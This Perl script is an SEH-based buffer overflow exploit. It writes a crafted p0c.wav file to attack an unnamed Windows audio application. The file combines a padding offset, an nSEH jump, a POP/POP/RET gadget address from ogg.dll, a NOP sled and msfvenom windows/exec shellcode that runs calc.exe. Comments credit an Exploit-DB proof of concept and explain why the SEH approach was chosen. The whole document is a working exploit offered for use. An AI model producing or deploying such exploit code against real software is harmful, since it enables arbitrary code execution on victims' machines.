#!/usr/bin/env perl
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# however he was attempting a vanilla buffer overflow
# in fact it is SEH based exploit
# using the address 0x7C9D30D7 limits the targets
#which I assume belongs to OS file didn't work on win7
#yes he did find a buffer overflow since the offset reaches ESP before SEH
#in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
#This p0c > win 7s & 8s
# ThreatActor at CoreRed.com
##
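use strict;
use warnings;

# Name of the sample file this script writes to the current directory.
my $file = "p0c.wav";

my $buff = "A" x 4116;               # offset to SEH

my $nseh = "\xeb\x06\xff\xff";       #dat 8 jmp

# pack('V') encodes the value as a 32-bit little-endian unsigned integer.
my $seh = pack('V', 0x66E42A79);     # 66E42A79 5E POP ESI ogg.dll

my $nop = "\x90" x 28;

#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
my $shell =
    "\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9"
  . "\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5"
  . "\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e"
  . "\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c"
  . "\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4"
  . "\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c"
  . "\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc"
  . "\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7"
  . "\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90"
  . "\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c"
  . "\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0"
  . "\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f"
  . "\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e"
  . "\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5"
  . "\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e"
  . "\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";

# Three-arg open with a lexical handle and an explicit failure check.
# The original two-arg form, open($FILE, ">$file"), let mode characters
# inside $file change the open mode, used an undeclared global handle, and
# silently continued when the open failed.
open my $fh, '>', $file or die "open $file: $!";
# The payload is raw bytes; binmode prevents newline translation on Windows.
binmode $fh;
print {$fh} $buff . $nseh . $seh . $nop . $shell;
# Buffered write errors only surface at close, so check it too.
close $fh or die "close $file: $!";

print "+++++++++++++++++++\n";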